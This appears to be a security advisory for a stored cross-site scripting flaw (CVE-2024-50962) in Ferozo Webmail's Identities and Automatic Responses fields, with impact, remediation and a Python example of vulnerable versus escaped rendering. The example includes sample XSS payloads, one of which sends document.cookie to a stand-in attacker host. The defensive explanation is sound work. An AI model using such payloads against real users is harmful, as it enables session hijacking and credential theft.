Suspected 0day
A Cross-Site Scripting (XSS) vulnerability
## Cross-Site Scripting (XSS) in DonWeb Ferozo Webmail (CVE-2024-50962)
### Description
A Cross-Site Scripting (XSS) vulnerability in **Ferozo Webmail v1.1** allows attackers to execute arbitrary scripts via the **Identities** and **Automatic Responses** components. This vulnerability can be used to hijack user sessions, conduct phishing attacks, and steal credentials.
### Attack Complexity
- **Low**
### Privileges Required
- **None**
### User Interaction
- **Required** (Users need to interact with the component containing the injected script.)
### Affected Components
- **Identities Page and Automatic Responses**: Insufficient input validation allows malicious script injection.
### Impact
- **Session Hijacking**: Script running in the victim's browser can read session tokens or perform actions with the victim's authenticated webmail session.
- **Phishing**: Injected iframes or forms can be used to present fake login prompts and steal credentials.
### Remediation
- **Input Validation and Output Encoding**: Validate the Identities and Automatic Responses fields against an allow-list on input, and HTML-encode the stored values for the context in which they are rendered; encoding on output is the primary fix, validation alone is not sufficient.
- **Content Security Policy**: Deploy a CSP (for example, `script-src 'self'` with no `'unsafe-inline'`) as defense in depth so that injected inline script is blocked even if an encoding bug remains.
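To make the description and the remediation concrete, the following is an added example (not code from Ferozo Webmail or from the reporter) showing the vulnerable pattern the advisory describes beside its hardened form. The sample identity name and auto-response text are constructed payloads, the function names are hypothetical, and the CSP value is one reasonable policy rather than anything the vendor ships.

```python
import html
import re

# Constructed sample inputs (not taken from the advisory): an attacker-controlled
# identity display name and an auto-response body, each carrying an XSS payload.
SAMPLE_IDENTITY_NAME = 'Alice <img src=x onerror="alert(document.cookie)">'
SAMPLE_AUTO_RESPONSE = (
    'Out of office.\n'
    '<script>location="https://attacker.example/?c="+document.cookie</script>'
)


def render_identity_vulnerable(display_name: str) -> str:
    """The bug class: the stored value is concatenated straight into HTML."""
    return f'<span class="identity-name">{display_name}</span>'


def render_identity_hardened(display_name: str) -> str:
    """Contextual output encoding: HTML-escape before placing the value in element content."""
    return f'<span class="identity-name">{html.escape(display_name, quote=True)}</span>'


def render_auto_response_hardened(text: str) -> str:
    """Auto-response text is treated as plain text: escape everything, then turn
    newlines into <br> so that the only markup in the output is ours."""
    escaped = html.escape(text, quote=True)
    return "<p>" + escaped.replace("\n", "<br>") + "</p>"


def validate_display_name(display_name: str) -> bool:
    """Allow-list validation on input: bounded length, no angle brackets, quotes,
    backslashes or control characters. This is a second layer, not the fix itself."""
    if not 1 <= len(display_name) <= 64:
        return False
    return re.fullmatch(r"[^<>\"'\\\x00-\x1f]+", display_name) is not None


# Defense in depth: a CSP that blocks inline script even if an encoding bug remains.
# (Hypothetical policy for this example; tune to the application's real asset origins.)
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'; "
    "frame-ancestors 'none'; base-uri 'self'",
)


def contains_active_markup(rendered: str) -> bool:
    """Demo-only check: does the rendered HTML still contain a raw script-bearing tag?"""
    return re.search(r"<(script|img|iframe)\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("vulnerable:", render_identity_vulnerable(SAMPLE_IDENTITY_NAME))
    print("hardened:  ", render_identity_hardened(SAMPLE_IDENTITY_NAME))
    print("auto-reply:", render_auto_response_hardened(SAMPLE_AUTO_RESPONSE))
    print("valid name?", validate_display_name(SAMPLE_IDENTITY_NAME))
    print("%s: %s" % CSP_HEADER)
```

The order of the layers matters: `html.escape` on output is what actually neutralises the payload, `validate_display_name` rejects obviously hostile values before they are stored, and `CSP_HEADER` limits the damage if a future template forgets to escape.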
---
**CVE-2024-50962**
*Reported by [Facundo Fernandez / Security Researcher]*